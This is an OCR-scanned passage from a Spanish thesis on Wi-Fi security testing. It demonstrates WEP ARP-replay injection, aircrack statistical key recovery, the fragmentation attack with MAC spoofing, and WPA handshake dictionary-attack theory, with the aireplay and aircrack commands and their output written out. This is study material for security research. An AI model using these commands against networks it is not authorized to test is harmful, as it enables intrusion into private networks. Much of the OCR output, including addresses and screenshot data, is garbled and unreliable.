The interface MAC (OO:80:5A:34 ) doesn't match the specified MAC (-h). 

ifconfig raO hw ether 0Q : 13 : F7: 02: 
12:49:37 Waiting for beacon frame (BSSID: 0Q:14:BF:BA ) on channel 18 

Saving ARP requests in replay_arp- 1229- 124837. cap 
You should also start airodump-ng to capture replies. 
Read 38998 packets (goto ARP requests and 15288 ACKs) 



Figura 5.21: Ataque de Inyeccion 

Destacar de la imagen dos aspectos relevantes. El primero hace referenda a los 
paquetes que han sido inspeccionados por la aplicacion en busca del paquete objetivo ARP. 
Dicho contador puede observarse en la parte inferior izquierda de la imagen (Read 38998 
packets). En segundo lugar todavia no se ha producido la captura del paquete ARP, tal y como 
indica el contador de la parte inferior (got ARP requests). 

Pero, ^como poder generar de manera intencionada un paquete ARP en la red 
objetivo?, la respuesta a esta cuestion puede encontrarse en el ya comentado ataque de 
denegacion de servicio. Asi pues produciendo un DoS a la estacion con direccion MAC 
"00:13:10:7A" se obligara a que la capa de enlace de datos realice una reconexion al medio, 
eliminando de la tabla ARP de la estacion victima cualquier entrada previa. Para que la capa 
de red pueda obtener comunicacion con cualquier estacion de la red necesitara generar una 
peticion ARP, la cual se propagara por el medio inalambrico. En dicho momento se 
procedera a la captura y reinyeccion masiva del paquete. El AP aceptara dicha trama, puesto 
que ha sido cifrada con un keystream valido, en caso contrario el paquete sera descartado. 
Destacar que la inyeccion del paquete siempre se realizara utilizando un mismo IV, lo que en 
verdad interesa es que la contestacion al ARP se realizara cifrando el paquete con un IV 
distinto cada vez, aumentando la entropia de la captura realizada. 

Tras la captura del paquete ARP la aplicacion Aireplay comenzara a reinyectar los 
paquetes tal y como muestra la figura. 
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bt - # aireplay-ng -3 -b 00:14:BF:BA: -h 00:13:F7:02: 

The interface MAC ( QQ : 80 : 5A: 34: ) doesn't 

ifconfig raQ hw ether QQ:13:F7:Q2: 
12:5(3:20 Waiting for beacon frame (BSSID: Q0 : 14: BF : BA: 
5aving ARP requests in replay_arp- 1229- 12502Q . cap 
You should also start airodump-ng to capture replies, 
lead 118200 packets (got 46099 ARP requests and 47194 ACKs 




on channel 10 



sent 57668 packets, . .(499 pps 



Figura 5.22: Reinyectando paquetes 



Obteniendo resultados 



Tras la inyeccion de trafico, la captura del Airodump muestra las estadisticas de la 



imagen. 



CH 10 ] [ Elapsed: 2 mins ][ 2007-12- 


29 12:52 






BSSID 


PWR RXO Beacons 


#Data, #/s 


CH HB ENC CIPHER AUTH 


ESSID 


00:14:BF:BA: 


1647 


101494 905 


10 48 WEP WEP 


3com 


BSSID 


STATION 


PWR Rate 


Lost Packets Probes 




Q0:14:BF:BA: 


00: 13:F7:02: 


0-0 


106876 





Figura 5.23: Generation de trafico 

Hasta el momento se ha conseguido inyectar mas de 100.000 paquetes en tan solo 2 
minutos de captura, con una velocidad de transmision de 905 paquetes por segundo. 
Avanzando un poco mas en el tiempo, pasados los cuatro minutos la inyeccion refleja lo 
siguiente. 



bt - t* aireplay-ng -3 -b 00 : 14: BF : BA: -h 08:13; 


F7:02; 


raO 




The interface MAC ( 00 : SB : 5A: 34: ) doesn't match 


the spec: 


Lfied MAC ( -1 


1 ) . 


ifconfig raO hw ether 0O:13:F7:02: 








12:50:20 Waiting for beacon frame (BSSID: O0:14:BF: 


BA: 


I on channel 


10 


Sawing ARP requests in replay_arp- 1229- 125020 . cap 








You should also start airodump-ng to capture replies 








^ead 236238 packets (got 91833 ARP requests and 938' 


\2 ACKs ) , 


sent 115304 


packets . . . ( 499 pps ) 



Figura 5.24: Aireplay 

Mientras que la captura de datos ha conseguido llegar a los 200.000 paquetes en tan 
solo 4 minutos de inyeccion. 
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CH IB ] [ 


Elapsed : 


4 mins ] [ 2007-12- 


■29 12:54 






BSSID 




PWR RXQ Beacons 


#Data, #/s 


CH HB ENC CIPHER AUT1 


H ESSID 


QQ:14:BF 


BA: 


91 275B 


200847 825 


10 48 WEP WEP 


3com 


BSSID 




STATION 


PWR Rate 


Lost Packets Probes 




00:14:BF 


BA: 


O0:13:F7:S2 


B- 


212453 





Figura 5.25: Pasados 4 mimttos 

Como se puede apreciar, no es complicado llegar a conseguir inyectar gran cantidad de 
trafico en un espacio relativamente corto de tiempo. En ultima instancia la aplicacion ha 
conseguido reenviar a la red 226.681 paquetes ARP generando un trafico de mas de medio 
millon de tramas en apenas diez minutos desde que fue lanzado. 



it - £ aireplay-ng -3 -b O0:14:BF:BA: -h Q0:13:F7:O2: ra0 

The interface MAC (00:8Q:5A:34: i doesn't match the specified MAC (-h). 

ifconfig raQ hw ether Q0:13:F7:02: 
12:5Q:2Q Waiting for beacon frame (BSSID: 00:14:BF:BA: ) on channel 10 

Saving ARP requests in replay_arp- 1229- 125O20. cap 
fou should also start airodump-ng to capture replies, 
^ead 592412 packets (got 226681 ARP requests and 236186 ACKs), sent 289216 packets ...( 499 pps) 



Figura 5.26: Aireplay: Pasados 10 minutos 

Y la respectiva captura del sniffer inalambrico. 



CH 10 ] [ Elap? 


;ed: 


10 mins ] [ 2007-12 


-29 13:00 




BSSID 




PWR RXQ Beacons 


#Data., #/s 


CH HB ENC CIPHER AUTH ESSID 


Q0:14:BF:BA: 




5921 


500975 858 


10 43 WEP WEP 3com 


BSSID 




STATION 


PWR Rate 


Lost Packets Probes 


Q0:14:BF:BA 




00: 13:F7:02: 


0-0 


534687 



Figura 5.27: Airedump: Pasados 10 minutos 

Con toda esta informacion recabada seria mas que posible romper la clave de cifrado 
mediante el uso de ataques estadisticos, este tipo de ataques se comentaran a continuacion. 

Tras las evidencias aportadas podemos afirmar que se han conseguido ambos objetivos 
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propuestos. En primer lugar se ha conseguido inyectar trafico en una red protegida con el 
protocolo de seguridad WEP, siendo este aceptado por el punto de acceso y retransmitido al 
medio. Y en segundo lugar se ha demostrado que es posible generar gran cantidad de trafico 
en un corto periodo de tiempo, mediante el uso de la reinyeccion de paquetes ARP. 



5.1.2.9 Prueba practica ATA que estadistico. 

• Objetivo: Conseguir la clave de cifrado de un punto de acceso especifico 
utilizando una captura de datos previa. 

• Objetivo secundario: Demostrar la efectividad y rapidez de los ataques 
estadisticos para distintos puntos de acceso. Para ello se ha realizado el mismo 
ataque a 8 capturas diferentes de datos. Estas capturas han sido tomadas de 8 
APs del escenario de pruebas. Para ello se realizaron ataques de inyeccion de 
trafico con el objetivo de incrementar el volumen de datos y su velocidad de 
captura. 

• Herramientas: Aplicacion Aircrack perteneciente a la Suite con el mismo 
nombre. 

• Victima: Captura de informacion perteneciente al punto de acceso con ESSID 
"trio pep" escogida de forma aleatoria. 

• Metodologia: 

1. Determinar el punto de acceso objetivo mediante Airodump. 

2. Capturar trafico del punto de acceso objetivo, bien de forma pasiva, bien 
inyectando trafico en la red, permitiendo un incrementado de la velocidad 
de la captura de datos. Para ello se hizo uso de la aplicacion Aireplay en los 
ataques 2 y 3. 

3. Detectar el objetivo en la captura, ya que al ser un medio broadcast, los 
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datos recolectados pueden pertenecer a mas de un AP. 




4. Lanzar la aplicacion Aircrack sobre el volumen de datos recogidos del 
punto de acceso. 

5. Obtener resultados 

Destacar que en esta seccion se obvian el primer y segundo punto de la metodologia 
debido a que el procedimiento de actuacion ha sido determinado en ataques anteriores. De 
esta manera tan solo se hace referenda a la parte que implica el ataque estadistico. 



Detectar el objetivo en la captura 

Los ataques estadisticos considerados como ataques pasivos, combinan tanto fuerza 
bruta como el uso de probabilidades para intentar determinar la clave de cifrado utilizada por 
un punto de acceso que utilice WEP como protocolo de encriptacion de la informacion. De 
esta forma haciendo uso de una captura previa de tamano considerable es posible conseguir el 
objetivo fijado. Cabe destacar que las primeras aproximaciones de implementaciones 
practicas de la vulnerabilidad necesitaban del orden de dos millones de paquetes cifrados para 
poder conseguir la clave de cifrado. En la actualidad estudios posteriores como los de la 
universidad de Darmstadt demuestran teoricamente y de forma practica que es posible 
romper una encriptacion WEP de 128 bits utilizando tan solo 50000 paquetes cifrados. Para 
una encriptacion de 64 bits el numero de paquetes necesarios se veria reducido 
considerablemente. Cabe destacar que durante esta demostracion practica se hara uso de la 
implementacion de este tipo de ataque llamado PTW e incorporado a la Suite Aircrack en su 
version 1.0 Beta como metodo estandar de ataque. 

Como se ha comentado anteriormente es necesaria una captura previa de datos. En este 
caso se va a utilizar la captura "salida.cap", resultado de los datos recogidos en el escenario 
propuesto. De esta manera la aplicacion es lanzada mediante la siguiente directiva. 



1 http : //eprint. iacr. org/2007/1 20 paper "Breaking 104 bit WEP in less than 60 seconds" 

2 http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-l. 0.0. tar. gz 
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aircrack salida.cap 



En este momento la aplicacion nos presenta una serie de estadisticas construidas a 
partir de la captura, listando el conjunto de puntos de acceso identificados asi como la 
cantidad de paquetes con IV validos para la aplicacion pertenecientes a cada uno. La validez 
de los IVs fue explicada en la parte teorica del ataque. 
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Figura 5.28: Estadisticas Aircrack 
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Lanzando el ataque mediante Air crack 



De la imagen se puede destacar que la aplicacion ha reconocido 221.301 paquetes de 
los cuales 40.959 pertenecen al punto de acceso con direccion MAC "00:11:E3:E3" y ESSID 
"trio pep". Esta volumen de datos es suficiente para poder lanzar el ataque. Asi pues se 
procede a ejecutar la siguiente instruccion. 



aircrack -n 64 -e "trio pep" -f 2 salida.cap 



Indicandole al Aircrack que busque claves de 64 bits con ESSID igual a "trio pep" 
dentro del archivo de captura salida.cap. Ademas utiliza un "fudge factor" de 2, parametro 
que se explicara mas adelante. En este momento la herramienta comienza su ejecucion 
reflejada en la siguiente imagen. 
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Figura 5.29: Aircrack trabajando 

En tan solo tres segundos de ejecucion Aircrack ya ha probado mas de medio millon 
de claves. El resto de resultados mostrados se comentan a continuacion. 

La primera columna de la izquierda refleja el "KeyByte" o indice del byte de la clave. 
Como observamos la clave esta compuesta por cinco bytes ordenados del cero al cuatro, 
obteniendo asi la ya comentada clave de cifrado de 40 bits. A continuacion la siguiente 
columna "depth" muestra la profundidad en la busqueda de la clave, mientras que 
"byte(vote)" reflejan los votos obtenidos para cada posible byte de la clave. 

Cada estimacion del byte de la clave tiene un numero diferente de votos asociado con 
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el, por lo que la probabilidad de que sea el correcto varia matematicamente. Cuantos mas 
votos tengamos de un byte o valor particular, mayor probabilidad hay de que sea el correcto. 
Para cada byte de la clave, la pantalla nos muestra el caracter mas probable y el numero de 
votos que ha acumulado. Sobra decir, que la clave que tenga el mayor numero de votos es la 
que mas probabilidades tiene de ser la correcta, pero no esta garantizado. Aircrack probara 
continuamente de la mas probable a la menos probable para encontrar la clave. 

Usando la informacion mostrada por la aplicacion entenderemos esto de forma mas 
clara. En la anterior captura de pantalla, puedes ver, que para el primer caracter o byte 0, 0x29 
ha obtenido unos cuantos votos, 1024 exactamente. Entonces, matematicamente, es mas 
probable que la clave comience por 29 que por 04 (el ultimo valor en la misma linea) . Esta es 
la razon por la cual cuantos mas paquetes tengas, mas facil sera para Aircrack determinar la 
clave WEP. 

La aproximacion estadistica puede por si sola darnos la clave de cifrado WEP de la 
red. Pero la idea es que tambien podemos complementarlo con la fuerza bruta para realizar el 
trabajo. Aircrack usa la fuerza bruta para determinar cuantas claves se han de probar para 
intentar encontrar la clave WEP. 

Aqui es donde entra en juego el "fudge factor". Basicamente el "fudge factor" le dice a 
aircrack hasta donde probar claves. Es como si quisiesemos encontrar un balon diciendole a 
alguien que el balon se puede encontrar entre y 10 metros alrededor. Pero si le decimos que 
el balon se encuentra entre y 100 metros alrededor. En este escenario de 100 metros le 
llevara mucho mas tiempo realizar la busqueda pero tendra mas posibilidades de encontrarlo. 

Por ejemplo, si le decimos a aircrack-ng que use un "fudge factor" de dos, dividira los 
votos del byte mas probable, y probara todas las posibilidades con un numero de votos de al 
menos la mitad de los que tiene el caracter mas posible. Cuanto mayor sea el "fudge factor", 
mas posibilidades probara aircrack-ng aplicando fuerza bruta. Recuerda, que cuanto mayor 
sea el "fudge factor", el numero de claves a probar crecera tremendamente y mayor sera el 
tiempo que se este ejecutando Aircrack. En cambio, cuantos mas paquetes de datos se hayan 
obtenido, se minimizara la necesidad de aplicar fuerza bruta a muchas claves, lo que hace que 
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no trabaje tanto tiempo la CPU y se reduce mucho el tiempo necesario para encontrar la clave. 

Si el "fudge factor" establecido nos ofrece como resultado que se van a probar "n" 
bytes diferentes para un valor de byte de la clave concreto, Aircrack lo refleja a modo de 
profundidad o "depth". Como ejemplo para el primer byte (el ) de la clave va a probar 11 
posibles combinaciones de la cual en ese preciso instante esta utilizando la cuarta (deph 4/11). 

Pasados escasamente ocho segundos la aplicacion muestra el siguiente resultado. 
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Figitra 5.30: Clave encontrada 1 



Obteniendo resultados 

Efectivamente Aircrack a conseguido la clave de cifrado "12:34:56:78:90", 
consiguiendo el objetivo propuesto, demostrar que es posible recuperar la clave de cifrado a 
partir de un volumen considerable de datos de la red y ademas de una forma extremadamente 
rapida. Para conseguir el objetivo secundario, probar la efectividad de la aplicacion, se ha 
realizado el ataque contra siete capturas mas, independientes de la anterior, obteniendo los 
resultados que ofrecen las imagenes siguientes. 
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] (ASCII: 12345 ) 


12) 5E ( 12) F6( 


12) 55 ( 


9) 68 ( 


9) 



Figura 5.31: Clave encontrada 2 




Figitra 5.32: Clave encontrada 3 



Alrenitk-ng 1.0 b*TiL ri£J 

NO; W; 121 Tea-bed »775 ten I sot 17flB HiS 

depth tyte^ot?) 

It 3i fiiaiSMI SUGMI MOISHI FfriWlNI EtfJLJ^dl JWiMiil 43U»4il E^jb-jiljl 4&.1W&\ aFUfiJJSI UUilSI ffiRJHMI 

oy n nnwi b^jhwi te':!3!bi w.itm\ w.nm\ 4i(!M»i CEdMisi <w.iw]A\ ejmrrcu ekjitmi emjijui Ermjaai 
6/ 3 tji:j?>«ii b&i&hti y&.i3it&\ f4<2hhi womiai rjimiffli if.'iuui «h.il5M.i e«ji5mi BMiisMi bj.:jlj«i h=(jlj*ji 

KV 10 5K2W1SI E«=(!i™i 13(213 

uy u !-t.:jLJ*ii wiKiiii ::j.:ji>kiji D«i»aii fwjmoji Etanasi Mfi«3*.i hx:m3*i ku&jj*! decjhbsi bqumui s<264«i 

«£V FOutt! [ 6i!fi3:ai!irJ!jn ] 
DKrYptod Gnrrwtly; un 



Figura 5.33: Clave encontrada 4 
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0/ 


1 


2 


0/ 


1 


3 0/1 


4 


0/ 


1 


5 


0/ 


1 


G 


3/ 


6 


7 


0/ 


1 


3 


0/ 


1 


9 


0/ 


1 


10 


0/ 


1 


11 


1/ 


1 


12 


0/ 


1 



BA(108288) F9(91648' 
DAC104448) 45(85760' 



FAC102144) E8O2160 
44(87296) GA(87040) 
DA(100864) 14(90388 
56(106496) C902416 
78(101632) 0F(89600 
BD03184) 67(87552) 
F7(90368) 93(90112) 
DA(92460) 86(87584) 



95(35504) 17(84992) 7A(84992) 
4A(89344) 07(88576) CF(86528) 
86(87808) 63(87808) 7D(87552) 
99(90112) 87(87552) F2(87040) 
79(85504) EE(85504) 46(85248) 
26(88832) 9E(84736) 0B(84480) 
72(37296) B9(87040) 48(85760) 
AE(88064) F4(87296) 98(87040) 
05(87040) 35(87040) 66(87040) 
5F(83064) 39(87040) 40(87040) 
CE(86668) 64(86552) 31(86464) 



key founb! [ FA:BA:DA:12:34:FA:BA:BA:56:78:FA:BA:DA ] 

Decrypted correctly! 100£ 



Figura 5.34: Clave encontrada 5 



Airtrxk-ng ).S LyLjj fHT 



SAITSfilfil )7I7-Jlfl4l Stl?Sfia61 26174236) 2EI74-752J E7I74-751) [£1737261 iEI734)?l ■»! 73L)h • -tiVdijh. 36172366? "il 1 VJ ftl-1 ■ 

JBIT3IH0) WlTM+aJ CGI7MJ?) 7TITU9G) HI7133U 291717250 <|4|7JZ)0) 'CE 1 7Z950 J 95172794) WITJTflJJ ]4|7244E:) FMTIIW? 

36163456) 3F 1 76632) 27175344) *Ff7fl4») J*tT3Mi) 35173726) 6JU 73726) HI 73726) «JMI 

J1IFJI92S) UinW) «|7«02) 2^5??*) 4417434*9 4F|7<Z«)) +9I7J934) 8EITJ472:) CGI 72744) EDI7244B) 45I72V3?) 03I7]H»J 

33166526) )6I 74544) )?l 750^6) CFI74ME0 F6I7414*) SCI 737261 36I73J1£) 6-LI73])6) ££172734} 2717244a? ifll721M) E1I721») 

J4|W1I&.> BFflWMJ MSITOEaPli «|7}WFJj *7|TWM) CM7JE]BJ ]F|739pW) 61172754) ]I)I7244E) 5 LI 71936) B4I71H3&) ZEtlUftfJ 

39103446:. 66173566) rt|73BM> 06173726) fc4l 73726) CLlTJIlh) D£I732:L6) J[l72466i 26172456) <i LI 7)4361 221716361 67173636) 

1MS9WS.' EDI77B5G) FFI7K3B) J9I73JJ0) 59I73WB1 <JM7372E0 EBI73JJ7) ]CI7279Jj Wl 72794) Ml 72734) C*|7i794j *N 72449) 

4^166334? EFJl 7*752) F7IMM6) 13173726) 43173477) 651734)71 ££172*56) FDI 72446) 64172 LOS) CFJI72L42) 3317)036) J'Jl 7)6361 

FCI734T2> E4|7J9») *EI 7270.4) 5*7177.744:. 99|724<l 5D|7241$.i 3FU7Z1S) 07|7]93G;. 40I71SJ5) FJi|7]W*) E9I 71639) 34171424;. 

6II73M6:. 3617(632) BBI7S6J2I 5DI757J6) SfilMTSM 36174496) LVl|744i6i 661730641 SFl734)H 261734)2) 4CI7347!) 43173716) 

111 74249) AZI 73934) CM 73934) )?|7j;-]M 17I729M) 9P|729W) EWI 727^4.' £9172744) E9I72LK) «4I 719363 77173936) «l 73936) 

37166524. ..4174626) A7I 742321 6C 1735)61 4£l 7344E) 26I72U64) 321721311 £4171437) 3617)6161 £517)644) 6417)764) All 71237) 



KEf FftlMC! | E*.36.lM.3L:33.3 
Decrypts ncToctLy: 1M%- 



\ISEtI: 2ftiL3*etff)3) J 



Figura 5.35: Clave encontrada 6 
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KB 

1 
2 
3 
4 
5 
6 
7 
8 
9 

10 
11 
12 


[00:00:55] Tested 79488 

depth byte(vote) 

0/ 1 1)5(104704) FF05232) 75 


2 k 
(86 


ey 
78 


3 (got 

4) 9E(E 
2) 4F(E 
B) 23(c 
2) 5E(c 


75287 IVs) 
6272) A2(84992) 


0/ 1 A4(102656) 3B(91648) E9(9011 
0/ 1 37(102656) 22(86528) 51(8601 
0/ 1 38(104448) AF(86528) A5(8627 
0/ 1 CF03184) 37(88576) 34(86784 
0/ 1 F4(105216) 82(90624) 02(8678 


6016) B6(8 
5760) 76(8 
6016) 60(8 


5248) 
3712) 
5248) 


) 09(8E 
4) E9(c 
2) 4B(c 
2) 7C(c 
) 36(8E 
) 18(86 


760) 75(85 
6016) A0(8 


504) 
5248) 


0/ 1 3A(105984) 3E(88832) 03(86 


27 
99 
52 
52 


6272) B4(8 


6016) 


0/ 1 38(100352) 10(85248) B7 
0/ 1 7D(92672) 72(88320) 13( 
0/ 3 AA(89600) 58(88320) 4B( 
2/ 1 FE(85760) 1B(85504) 23( 
1/ 1 AE(82944) 10(82688) 5C( 


(84 
375 
875 


4736) 
760) F 
016) 5 


C5(8 
A(85 
4(84 


4480) 

760) 

992) 


852 






:;!fe 


7(84 
B(82 


736) 
432) 










2/ 5 70(85404) CF(83536) B0(83112) 20(83052) D 

KEY FOUNB! [ B5:A4:37:33:CF:F4:3A:38:7I):FlA:21 
Becrypted correctly: 1001 


2(82 

:00: 


892) 
6B ] 



Figitra 5.36: Clave encontrada 7 









Aircrack-ng 1 


,0 betal 










[00:00:02] Tested 745 keys (g 


■jt 59022 IVs 


) 


KB 

1 
2 
3 
4 


depth 
0/ 8 
0/ 1 
8/ 2 
0/ 2 
86/ 4 


byte(vote) 

74(82688) AB(71424) 4A(69376) 
46(85248) 65(68608) 9A(67840) 
E9(67072) 41(66048) 7B(65792) 
2F(86016) 12(69888) AA(67840) 
EC(60672) 0E(60416) 43(60416) 


40(67840) 4; 
BF( 67840) 4! 
97(65792) 91 
82(67328) 2\ 

46(60416) e: 


5(675 
:(673 
1(657 
3(665 
2(804 


84) 
28) 
92) 
60) 
16) 




KEY FOUNB! [ 74:1A:1B:C5:F9:C8:8E 
Becrypted correctly: 1001 


;45:CC:8A:22 


;10:43 ] 



Figitra 5.37: Clave encontrada 8 



Como se observa, el resultado ha sido positivo, se han conseguido las claves de cifrado 
en todos los casos, consiguiendo el objetivo secundario propuesto. 
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5.1.2.10 PRUEBA PRACTICA ATA QUE DE FRAGMENTACION. 

• Objetivo: Conseguir una cadena de cifrado valida que nos permita encriptar 
cualquier tipo de trafico en la red sin el repudio del AP. 

• Objetivo secundario: 

o Desencriptar un paquete de datos mediante el uso de elementos 
externos. Este objetivo no sera contemplado en esta practica. 

o Inherentemente demostrar el ataque inductivo Arbaugh. 

• Herramientas: Aplicacion Aireplay y Airodump perteneciente a la Suite 
Aircrack. La primera en su "ataque 5 fragmentacion" se utilizara para llevar a 
cabo el ataque, mientras que la segunda sera usada para establecer y determinar 
la estacion victima. Tarjeta inalambrica RT2500 

• Victima: Captura de informacion perteneciente al punto de acceso con ESSID 
"3 com" escogida de forma aleatoria. 

• Metodologia: 

1. Establecer el punto de acceso objetivo, mediante la aplicacion Airodump, 
en su modo de captura de datos. 

2. Lanzar la aplicacion Aireplay en su modo 5 o modo de fragmentacion. 

3. Obtener la cadena de cifrado tras la ejecucion de la aplicacion. 

Esta tecnica propuesta por Bittau, A., Handley, M., Lackey , J., (2006) en el paper 
"The Final Nail in WEP's Coffin ", permite recuperar el keystream para un IV determinado 
de una red que utilice el protocolo de seguridad WEP. Para ello utiliza una funcionalidad del 
protocolo IEEE802.il llamada fragmentacion. Mediante el conocimiento del texto piano de 
pequenos paquetes de datos es posible establecer una cadena de cifrado de mayor longitud 
mediante la captura ensamblada de la retransmision del AP. 
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Determinando del objetivo 

En esta demostracion practica se van a utilizar las aplicaciones de la Suite Aircrack, 
Aireplay y Airodump. En primer lugar es necesario establecer cual va a ser la estacion 
seleccionada para el ataque, para ello se lanzara el Airodump en el canal escogido mediante la 
sentencia siguiente. 



Airodump -channel 1 raO 



Tras lanzar el sniffer inalambrico la aplicacion comienza a mostrar la siguiente 
informacion. 



CH 10 ] [ Elapsed: 


6 mins ] [ 


2007-12 


29 12:44 




BSSID 


PWR RXQ 


Beacons 


#Data, #/s CH HB ENC CIPHER AUTH 


ESSID 


00:14:BF:BA: 


100 


3652 


216 10 48 WEP WEP OPN 


3com 


BSSID 


STATION 




PWR Rate Lost Packets Probes 




00:14:BF:BA: 


00:13:F7:02: 


Q Q- 59 3com 





Figura 5.38: Determinando el objetivo 



Como se puede observar el punto de acceso objetivo sera el perteneciente al ESSID 
'3com" con la estacion asociada con direccion MAC "00:13:F7:02:". 



Lanzando el ataque 



A continuacion se lanza la aplicacion Aireplay mediante la instruction siguiente. 



Aireplay -5 -b 00:14:BF:BA -h 00:13:F7:02 raO 
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De esta forma todo paquete remitido por la estacion atacante sera enviado con la MAC 
falseada de la estacion asociada al AP 00:13:F7:02 mediante el uso del parametro "-h", 
obteniendo como resultado la siguiente captura. 



The interface MAC IO0:80:5A:34:FD:DD) doesn't match the specified MAC 

ifconfig raO hw ether GO: 13:F7:B2:B5:C8 
12:44:B7 Waiting for beacon frame [ESSID: 3com) on channel 10 
Found BSSID "00: 14:BF:BA:C0:E3" to given ESSID "3com". 
12:44:07 Waiting for a data packet,,, 
Sead S packets. . . 

Size: 78, FromDS: 1, ToDS: (WEPi 



BSSID 

Dest. MAC 

Source MAC 



00:14:BF:BA:C0:E3 
01:80:C2:00:O0:0O 
00:14:BF:BA:C0:E3 



0842 O000 0180 c200 0000 0O14 bfba C0e3 

0014 bfba C0e3 2091 cbfO 8600 4a67 6c33 

ca06 a954 685b 0e6f b0dO 933e 307a 4146 

beOf 3af9 f0c0 709a 1226 88a7 d07e ebfb 

6bl5 3bbb 57be a229 351d 36c4 5875 



Jgl3 

. Th[.o. . .5-0ZAF 



Jse this packet 



Saving chosen packet in replay_src- 1229- 124408. cap 

12:44:12 Data packet found! 

12:44:12 Sending fragmented packet 

12:44:12 Got RELAYED packet! ! 

12:44:12 Trying to get 384 bytes of a keystream 

12:44:12 Got RELAYED packet! ! 

12:44:12 Trying to get 1500 bytes of a keystream 

12:44:12 Got RELAYED packet! ! 

Saving keystream in fragment- 1229- 124412. stor 

Mow you can build a packet with packetforqe-nq out of that 1500 bytes keystream 



back I track HI* 



Figura 5.39: Ataque fragmentacion 



La herramienta Aireplay pide confirmation que paquete es el que se va a utilizar para 
ser fragmentado. Tras la aprobacion manual del atacante, comienza el envio fragmentado del 
paquete. 



Obteniendo resultados 



reensamblado y 



En primera instancia Aireplay informa que el paquete fragmentado a 
transmitido por el medio obteniendo su replica. 



sido 
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12:44:12 Data packet found! 
12:44:12 Sending fragmented packet 
12:44: 12 Got RELAYED packet! ! 



A continuation la aplicacion probara mediante el uso de tecnicas Arbaugh conseguir 
un keystream de tamano superior al del paquete retransmitido en primera instancia. 



12:44:12 Trying to get 384 bytes of a keystream 
12:44: 12 Got RELAYED packet! ! 
12:44:12 Trying to get 1500 bytes of a keystream 
12:44: 12 Got RELAYED packet! ! 



Una vez conseguido una cadena de cifrado de igual tamano a la MTU establecida por 
el protocolo 802.3 Ethernet, es salvada en la captura "fragment-1229-124412.xor". 



root root 
root root 



47 Dec 
337 Dec 



root root 337 Dec 7 16:29 Set\ IPX address 

root root 152S Dec 29 12:44 fragment- 1229- 124412 . stor 

root root 118 Dec 29 12:38 replay_src- 1229- 123854, cap 

root root 118 Dec 29 12:40 replay_src- 1229- 124S5S , cap 

root root 118 Dec 29 12:41 replay src- 1229- 124110 , cap 



ack track 



root root 
root root 



118 Dec 29 12:44 replay_ 



re- 1229- 124110, cap 
re- 1229- 124408. cap 



Figura 5.40: Resultado archivo .xor 



De esta forma ha sido posible demostrar que, en menos de un segundo se ha 
conseguido una cadena de cifrado valida, mediante el uso de fragmentation y tecnicas 
Arbaugh, util para inyectar cualquier trama de datos en la red inalambrica. 
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5.2 WPA 

5.2.1 ESTUDIO TEORICO DE LA VULNERABILIDAD 

5.2.1.1 Ataques de diccionario y fuerza bruta 

802.1 li y en concreto WPA conforman un protocolo de seguridad complejo y fiable, si 
son utilizados de la manera adecuada. No obstante no esta exento de ser susceptible a ataques 
de diccionario y fuerza bruta. En esta seccion se detalla de forma teorica el principal "Talon 
de Aquiles" que presenta este protocolo. Como ya se comento en el funcionamiento de WPA, 
el principal problema de seguridad reside en el proceso de autenticacion entre las estaciones 
de la red y el punto de acceso, el llamado saludo a cuatro vias o "4 way-handshake", como se 
demuestra en las publicaciones de Mitchell, J., ChanHua, He., (2004) "1 Message attack on 
the 4-way handshake" y Moen, V., Raddum, H., Hole, J. (2004) "Weakness inthe Temporal 
Key Hash of WPA" , en las que se basa el estudio realizado. 

El proceso de autenticacion detallado en secciones anteriores, consta del intercambio 
de 4 paquetes para la gestion del acceso a la red. La brecha de seguridad que un atacante 
podria utilizar se encuentra tanto en el segundo como en el cuarto paquete. Ya que en ambos 
es transmitido desde la estacion al AP, el MIC o control de integridad y el mensaje EAPoL en 
claro. Recordar que el valor MIC conforma el resultado de aplicar el algoritmo de control de 
integridad "Michael" al mensaje EAPoL, dicha funcion toma como entrada el paquete de 
datos mismo, las direcciones MAC origen/destino y ademas parte de la PTK. Todo ello 
genera mediante la funcion de HASH HMACMD5 la cadena de control de integridad. 

Asi pues un atacante podria capturar ambos valores, el MIC y el paquete sin cifrar 
EAPoL para inferir la clave de cifrado mediante fuerza bruta. Para ello en primera instancia 
debera calcular, realizando una estimacion, la PMK' usando para ello la PSK' o clave 
compartida y el ESSID. Una vez generada una posible PMK', su resultado es utilizado por 
otra funcion matematica que calculara la PTK', usando las direcciones MAC de los 
dispositivos y los dos valores aleatorios intercambiados SNonce y Anonce. Asi pues el 
atacante ya puede calcular un valor MIC estimado del paquete de datos EAPoL capturado, 
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utilizando la PTK'. El resultado de la estimacion es comparado con el valor capturado, si 
MIC=MIC la PSK es la correcta. 

Para ayudar a comprender todo el proceso nada mejor que utilizar un ejemplo de una 
captura real para observar el valor de los terminos comentados. Las siguientes imagenes 
muestran el proceso de autenticacion "4-Way Handshake" entre una estacion y un punto de 
acceso. Destacar que se ha eliminado todo trafico que no cumple el criterio de pertenecer a un 
paquete 802. IX (0x888E). 

• AP~> Estacion. Primer paquete de autenticacion no contiene informacion 
relevante para el atacante. 

• Estacion --> AP. Segundo paquete del saludo inicial ya contiene informacion 
relevante. El atacante captura el valor aleatorio SNonce, resaltado en verde en 
la imagen siguiente. 
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fb 
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00 


S3 


Se 
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da 


bd 
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57 


41 


la 
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32 
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02 













Figura 5.41: Valor SNonce 



AP~> Estacion. Tercer paquete de autenticacion, la informacion relevante 
capturada es, tanto el numero aleatorio Anonce (color verde) como las 
direcciones MAC del punto de acceso y la estacion suplicante (color azul y 
rojo respectivamente). 
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Figitra 5. 42: I T alor AN once 



Estacion --> AP. Ultimo paquete del saludo, la informacion capturada es el 
valor MIC calculado mediante parte de la PTK y la trama de datos utilizada en 
la funcion de Hash (paquete EAPoL). Destacar que el valor del MIC es 
anadido posteriormente al paquete, hasta que su valor no es calculado, la trama 
se rellena con O's. 
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Figura 5.43: Ultimo paquete 



A continuacion al atacante tan solo le queda seguir los pasos que a continuacion se 
detallan para determinar si su estimacion de la PSK ha sido la correcta. 

• Mediante los datos obtenidos de la captura se generara la PMK, utilizando la 
funcion de HASH SHA1. Destacar que dicha funcion requiere de un coste 
computacional elevado y representa uno de los principales escollos de los 
ataques de fuerza bruta y diccionario. 
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PMK = pdkdf2_SHAl (frase secreta, SSID, longitud del SSID, 4096) 
PMK = pbkdf2 shal ("fraseTest", "linksys", 7, 4096) ; Ejemplo 



Una vez obtenida la PMK , generara la PTK mediante la funcion 
pseudoaleatoria PRF-X, donde la X indica el valor en bytes de la salida. 512 
bytes para TKIP en este caso. 



PTK 


